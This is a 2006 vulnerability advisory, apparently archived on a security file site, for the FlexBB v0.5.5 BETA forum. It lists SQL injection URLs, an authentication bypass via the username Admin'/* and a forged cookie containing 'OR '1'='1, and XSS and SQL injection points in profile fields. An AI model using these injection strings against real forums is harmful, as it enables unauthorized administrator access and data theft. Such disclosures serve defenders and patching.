FlexBBv0.5.5.txt

FlexBBv0.5.5.txt: Posted Apr 19, 2006; Authored by kr4ch; FlexBB v0.5.5 BETA suffers from SQL injection, login bypass and XSS vulnerabilities.; tags | advisory, vulnerability, sql injection; SHA-256 | b8ea942780958c38be32b05ac17a473e46769ee031220d6f975bd37d7ecbe45b; Download | Favorite | View

FlexBBv0.5.5.txt

App: FlexBB v0.5.5 BETA
Advistory by: p0w3r - curse-crew.de

SQL Inj:
magic_quotes_gpc = off
/index.php?page=showprofile&id=1'[SQL]/*
/index.php?page=forums&forumid=1'[SQL]/*
/index.php?page=viewthread&threadid=1'[SQL]/*
/index.php?page=editpost&threadid=1'[SQL]/*


Login bypass:
magic_quotes_gpc = off
Nick:  Admin'/*
PW:  foo
PW Hash in "flexbb_password" Cookie

Login bypass[Cookie]:
magic_quotes_gpc = off
flexbb_username: Admin
flexbb_password: foo'+OR+'1'='1
loggedin: TRUE

XSS:
"User CP"->"Edit Profile"
ICQ: [XSS] & '[SQL]/*
AIM: [XSS] & '[SQL]/*
MSN: [XSS] & '[SQL]/*
Google Talk: [XSS] & '[SQL]/*
Website Name: [XSS] & '[SQL]/*
Website Address: [XSS] & '[SQL]/*
Email Address: [XSS] & '[SQL]/*
Location: [XSS] & '[SQL]/*
Signature: [XSS] & '[SQL]/*
Sub-Titles: [XSS] & '[SQL]/*

Top Authors In Last 30 Days

Red Hat 308 files
Ubuntu 67 files
Debian 24 files
Gentoo 8 files
Google Security Research 7 files
LiquidWorm 6 files
Apple 5 files
Jann Horn 3 files
Spencer McIntyre 3 files
Milad Karimi 3 files

File Archives

Systems

AIX (430)
Apple (2,133)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,177)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (395)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (52,160)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,495)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,025)
UNIX (9,482)
UnixWare (188)
Windows (6,786)
Other

FlexBBv0.5.5.txt

FlexBBv0.5.5.txt

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

FlexBBv0.5.5.txt

Share This

FlexBBv0.5.5.txt

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems